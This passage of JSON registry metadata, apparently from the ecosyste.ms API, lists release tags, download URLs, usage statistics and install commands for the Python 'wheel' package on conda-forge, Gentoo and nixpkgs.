ished_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:38.318Z","dependent_packages_count":56,"downloads":null,"downloads_period":null,"dependent_repos_count":5672,"rankings":{"downloads":null,"dependent_repos_count":0.03493188282848446,"dependent_packages_count":1.3224212785069114,"stargazers_count":19.766455411946705,"forks_count":16.143520135735315,"docker_downloads_count":null,"average":9.316832177254353},"purl":"pkg:conda/wheel?repository_url=https://conda-forge.org","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/conda/wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/conda/wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/conda/wheel/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":true,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/wheel/codemeta","maintainers":[],"registry":{"name":"conda-forge.org","url":"https://conda-forge.org","ecosystem":"conda","default":false,"packages_count":20636,"maintainers_count":0,"namespaces_count":0,"keywords_count":13549,"github":"conda-forge","metadata":{"kind":"conda-forge","key":"CondaForge","api":"https://conda.anaconda.org","funded_packages_count":2269},"icon_url":"https://github.com/conda-forge.png","created_at":"2022-10-03T15:37:08.743Z","updated_at":"2026-06-10T05:18:51.687Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/namespaces"}},{"id":14512162,"name":"dev-python/ensurepip-wheel","ecosystem":"gentoo","description":"Shared wheel wheel for use in pip tests","homepage":"https://github.com/pypa/wheel/","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":["~alpha","amd64","arm","arm64","~hppa","~loong","~m68k","~mips","ppc","ppc64","~riscv","~s390","~sparc","x86"],"namespace":"dev-python","versions_count":1,"first_release_published_at":"2026-05-24T09:38:34.000Z","latest_release_published_at":"2026-05-24T09:38:34.000Z","latest_release_number":"0.47.0","last_synced_at":"2026-05-27T02:22:59.856Z","created_at":"2026-05-27T02:22:59.510Z","updated_at":"2026-05-27T02:23:00.361Z","registry_url":"https://packages.gentoo.org/packages/dev-python/ensurepip-wheel","install_command":"emerge dev-python/ensurepip-wheel","documentation_url":"https://packages.gentoo.org/packages/dev-python/ensurepip-wheel","metadata":{"category":"dev-python","slot":"0","eapi":"8","inherit":"distutils-r1 pypi","iuse":"test python_targets_pypy3_11 python_targets_python3_13t python_targets_python3_14t python_targets_python3_11 python_targets_python3_12 python_targets_python3_13 python_targets_python3_14 verify-provenance"},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-27T02:23:00.334Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:gentoo/dev-python/ensurepip-wheel","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/gentoo/dev-python/ensurepip-wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/gentoo/dev-python/ensurepip-wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/gentoo/dev-python/ensurepip-wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/dev-python%2Fensurepip-wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/dev-python%2Fensurepip-wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/dev-python%2Fensurepip-wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/dev-python%2Fensurepip-wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/dev-python%2Fensurepip-wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/dev-python%2Fensurepip-wheel/codemeta","maintainers":[],"registry":{"name":"gentoo-portage","url":"https://packages.gentoo.org/","ecosystem":"gentoo","default":true,"packages_count":19340,"maintainers_count":0,"namespaces_count":174,"keywords_count":382,"github":"gentoo","metadata":{"snapshot_url":"https://distfiles.gentoo.org/snapshots/portage-latest.tar.xz","funded_packages_count":77},"icon_url":"https://github.com/gentoo.png","created_at":"2026-05-26T08:59:24.155Z","updated_at":"2026-06-10T05:04:01.738Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/namespaces"}},{"id":14513449,"name":"dev-python/wheel","ecosystem":"gentoo","description":"A built-package format for Python","homepage":"https://github.com/pypa/wheel/","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":["~alpha","amd64","arm","arm64","~hppa","~loong","~m68k","~mips","ppc","ppc64","~riscv","~s390","~sparc","x86","~arm64-macos","~x64-macos","~x64-solaris"],"namespace":"dev-python","versions_count":1,"first_release_published_at":"2026-05-24T09:38:34.000Z","latest_release_published_at":"2026-05-24T09:38:34.000Z","latest_release_number":"0.47.0","last_synced_at":"2026-05-27T02:41:38.059Z","created_at":"2026-05-27T02:41:37.701Z","updated_at":"2026-05-27T02:41:38.453Z","registry_url":"https://packages.gentoo.org/packages/dev-python/wheel","install_command":"emerge dev-python/wheel","documentation_url":"https://packages.gentoo.org/packages/dev-python/wheel","metadata":{"category":"dev-python","slot":"0","eapi":"8","inherit":"distutils-r1 pypi","iuse":"test python_targets_pypy3_11 python_targets_python3_13t python_targets_python3_14t python_targets_python3_15t python_targets_python3_11 python_targets_python3_12 python_targets_python3_13 python_targets_python3_14 python_targets_python3_15 verify-provenance"},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-27T02:41:38.425Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:gentoo/dev-python/wheel","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/gentoo/dev-python/wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/gentoo/dev-python/wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/gentoo/dev-python/wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/dev-python%2Fwheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/dev-python%2Fwheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/dev-python%2Fwheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/dev-python%2Fwheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/dev-python%2Fwheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/dev-python%2Fwheel/codemeta","maintainers":[],"registry":{"name":"gentoo-portage","url":"https://packages.gentoo.org/","ecosystem":"gentoo","default":true,"packages_count":19340,"maintainers_count":0,"namespaces_count":174,"keywords_count":382,"github":"gentoo","metadata":{"snapshot_url":"https://distfiles.gentoo.org/snapshots/portage-latest.tar.xz","funded_packages_count":77},"icon_url":"https://github.com/gentoo.png","created_at":"2026-05-26T08:59:24.155Z","updated_at":"2026-06-10T05:04:01.738Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/namespaces"}},{"id":13082184,"name":"python311Packages.wheel","ecosystem":"nixpkgs","description":"Built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-01T17:52:28.795Z","latest_release_published_at":"2026-02-01T17:52:28.795Z","latest_release_number":"0.45.1","last_synced_at":"2026-03-09T06:20:12.484Z","created_at":"2026-02-01T17:52:20.774Z","updated_at":"2026-03-09T06:34:07.996Z","registry_url":"https://search.nixos.org/packages?channel=24.11\u0026query=python311Packages.wheel","install_command":"nix-env -iA nixpkgs.python311Packages.wheel","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.11/pkgs/development/python-modules/wheel/default.nix#L35","metadata":{"nix_attribute":"python3.11-wheel-0.45.1","position":"pkgs/development/python-modules/wheel/default.nix:35","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","aarch64-windows","x86_64-windows","i686-windows","i686-freebsd","x86_64-freebsd"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"wheel","upstream_purl":"pkg:pypi/wheel"},"repo_metadata":{},"repo_metadata_updated_at":null,"dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python311Packages.wheel?channel=24.11\u0026repository_url=https://channels.nixos.org/nixos-24.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python311Packages.wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python311Packages.wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python311Packages.wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python311Packages.wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python311Packages.wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python311Packages.wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python311Packages.wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python311Packages.wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python311Packages.wheel/codemeta","maintainers":[{"uuid":"siriobalmelli","login":null,"name":"Sirio 